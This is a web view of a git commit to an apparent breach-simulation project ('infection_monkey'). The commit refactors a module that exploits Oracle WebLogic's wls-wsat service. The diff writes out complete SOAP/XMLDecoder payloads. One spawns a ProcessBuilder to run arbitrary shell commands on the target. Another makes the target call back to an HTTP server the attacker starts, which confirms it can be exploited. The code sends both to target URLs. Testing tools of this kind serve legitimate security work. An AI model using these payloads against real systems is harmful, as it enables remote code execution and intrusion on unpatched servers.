p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Notes fixed and tested

This commit is contained in:
Vakaris 2018-08-25 17:56:43 +03:00
parent 39bb41ed25
commit 307a7c396c
2 changed files with 77 additions and 67 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
infection_monkey/config.py
View File

@ -191,7 +191,8 @@ class Configuration(object):
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,
8008, 7001 # HTTP alternate 8008, # HTTP alternate
7001 # Oracle Weblogic default server port
] ]
tcp_target_ports = [22, tcp_target_ports = [22,
2222, 2222,

141
infection_monkey/exploit/weblogic.py
View File

@ -17,11 +17,11 @@ import logging
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there # How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType", URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11", "/wls-wsat/CoordinatorPortType11",
@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
return exploit_config return exploit_config
def exploit(self, url, command): def exploit(self, url, command):
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
if 'linux' in self.host.os['type']: if 'linux' in self.host.os['type']:
cmd_base = '/bin/sh' payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
cmd_opt = '-c'
command += ' 1> /dev/null 2> /dev/null'
else: else:
cmd_base = 'cmd' payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
cmd_opt = '/c'
command += ' 1> NUL 2> NUL'
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
try: try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e: except Exception as e:
@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
class HTTPServer(threading.Thread): class IndicationHTTPServer(threading.Thread):
""" """
Http server built to wait for GET requests. Because oracle web logic vuln is blind, Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
self._stopped = False self._stopped = False
self.lock = lock self.lock = lock
threading.Thread.__init__(self) threading.Thread.__init__(self)
self.daemon = True
def run(self): def run(self):
class S(BaseHTTPRequestHandler): class S(BaseHTTPRequestHandler):
@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
lock = threading.Lock() httpd, lock = self._start_http_server()
local_port = get_free_tcp_port() payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
httpd.daemon = True
lock.acquire()
httpd.start()
lock.acquire()
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{lhost}:{lport}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0
def _start_http_server(self):
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def _stop_http_server(self, httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
if httpd.get_requests > 0: return True
exploited = True
else:
exploited = False @staticmethod
return exploited def exploit_payload(cmd_base, cmd_opt, command):
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
return payload
@staticmethod
def test_payload(ip, port):
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{host}:{port}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(host=ip, port=port)
return payload